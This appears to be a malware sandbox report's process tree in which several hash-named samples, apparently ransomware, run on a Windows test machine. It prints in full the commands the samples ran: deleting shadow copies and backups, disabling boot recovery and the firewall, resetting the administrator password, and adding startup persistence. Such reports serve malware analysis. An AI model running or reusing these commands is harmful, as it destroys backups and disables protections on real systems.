  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=7064,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5180 /prefetch:1
  PID:3948
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4880,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:8
  PID:6000
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6644,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6708 /prefetch:8
  PID:3136
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3236,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6656 /prefetch:8
  PID:3128
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=5212,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5868 /prefetch:1
  PID:5008
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6596,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6184 /prefetch:8
  PID:5456
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5632,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8
  PID:3996
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5872,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8
  PID:3200
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5396,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6652 /prefetch:8
  PID:3612
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=5716,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3584 /prefetch:1
  PID:1252
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=6636,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:1
  PID:6080
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5684,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:8
  PID:228
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6620,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:8
  PID:3704
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=6308,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1352 /prefetch:1
  PID:7672
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=4840,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3376 /prefetch:1
  PID:3696
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=6684,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:1
  PID:6428
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3456,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2988 /prefetch:8
  PID:7412
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5012,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5616 /prefetch:1
  PID:5812
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5424,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6404 /prefetch:8
  PID:1488
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=7356,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:1
  PID:29464
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=7468,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5752 /prefetch:1
  PID:29680
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=2924,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7284 /prefetch:12⤵PID:13896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:82⤵PID:13912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7300 /prefetch:82⤵PID:13980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=7472,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:12⤵PID:548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4668,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:82⤵PID:7600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=5708,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:12⤵PID:15112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5496,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7220 /prefetch:82⤵PID:15124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=6624,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1248 /prefetch:12⤵PID:19500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7544,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:82⤵PID:19516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:2816
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:356
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:2212
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5344
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\" -ad -an -ai#7zMap23165:190:7zEvent44191⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5436
-
C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"1⤵
- Executes dropped EXE
PID:4496
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops startup file
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5848 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
PID:4192
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵PID:23104
-
-
C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"1⤵
- Executes dropped EXE
PID:5360
-
C:\Windows\system32\pcwrun.exeC:\Windows\system32\pcwrun.exe "C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe" ContextMenu1⤵PID:4300
-
C:\Windows\System32\msdt.exeC:\Windows\System32\msdt.exe -path C:\Windows\diagnostics\index\PCWDiagnostic.xml -af C:\Users\Admin\AppData\Local\Temp\PCWFFB8.xml /skip TRUE2⤵
- Suspicious use of FindShellTrayWindow
PID:3856
-
-
C:\Windows\System32\sdiagnhost.exeC:\Windows\System32\sdiagnhost.exe -Embedding1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3984 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxajrlbz\dxajrlbz.cmdline"2⤵PID:5024
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40D.tmp" "c:\Users\Admin\AppData\Local\Temp\dxajrlbz\CSC2575887E8B184585B3B9C44FB5636CE2.TMP"3⤵PID:5268
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4sok3ih\s4sok3ih.cmdline"2⤵PID:4364
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES46B.tmp" "c:\Users\Admin\AppData\Local\Temp\s4sok3ih\CSC502B6C4B714E42C08C50A36E9A33D40.TMP"3⤵PID:1272
-
-
-
C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"1⤵
- Executes dropped EXE
PID:3708
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\00acf5d0db7ef50140dae7a3482d9db80704ec98670bd1607e76c99382a4888c\" -ad -an -ai#7zMap24245:190:7zEvent145661⤵
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\" -ad -an -ai#7zMap8206:190:7zEvent117351⤵
- Suspicious use of AdjustPrivilegeToken
PID:5640
-
C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe"C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe"1⤵
- Executes dropped EXE
PID:4280 -
C:\Windows\system32\net.exe"net" session2⤵PID:5900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:3796
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5556 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\README-7ILxnOHKLf.md2⤵PID:2036
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\" -ad -an -ai#7zMap295:190:7zEvent310451⤵
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe"C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe"1⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3916 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F2⤵
- System Location Discovery: System Language Discovery
PID:4464 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2368
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2osrakf2\2osrakf2.cmdline"2⤵
- System Location Discovery: System Language Discovery
PID:524 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1C6.tmp" "c:\ProgramData\CSC8BF11E4749A64B498E688F446F4116AB.TMP"3⤵
- System Location Discovery: System Language Discovery
PID:2804
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet2⤵
- System Location Discovery: System Language Discovery
PID:1912
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP2⤵
- System Location Discovery: System Language Discovery
PID:2316
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4496
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet2⤵
- System Location Discovery: System Language Discovery
PID:1112
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- System Location Discovery: System Language Discovery
PID:5788
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no2⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off2⤵
- System Location Discovery: System Language Discovery
PID:2008 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
PID:3720 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\winlogon.exe1⤵PID:1608
-
C:\ProgramData\winlogon.exeC:\ProgramData\winlogon.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\winlogon.exe1⤵PID:3216
-
C:\Windows\winlogon.exeC:\Windows\winlogon.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:564
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Restore-My-Files.txt1⤵PID:1792
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\" -ad -an -ai#7zMap21156:190:7zEvent322971⤵PID:4824
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be.bat1⤵
- Opens file in notepad (likely ransom note)
PID:3464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be\8d1d36a7ad23626341f658815bfd21a6274f703aca2126bddfad63fa749041be.bat" "1⤵
- Drops file in System32 directory
PID:1580 -
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe2⤵
- Kills process with taskkill
PID:3012
-
-
C:\Windows\system32\net.exenet user administrator 42172⤵PID:904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator 42173⤵PID:1072
-
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Tsuchigumo.bat /d "C:\Windows\system32\Tsuchigumo.bat" /f2⤵
- Adds Run key to start application
PID:5800
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Control Panel\Desktop" /v Wallpaper /f2⤵PID:1468
-
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:3744
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:4456
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
PID:6088
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:632
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4828
-
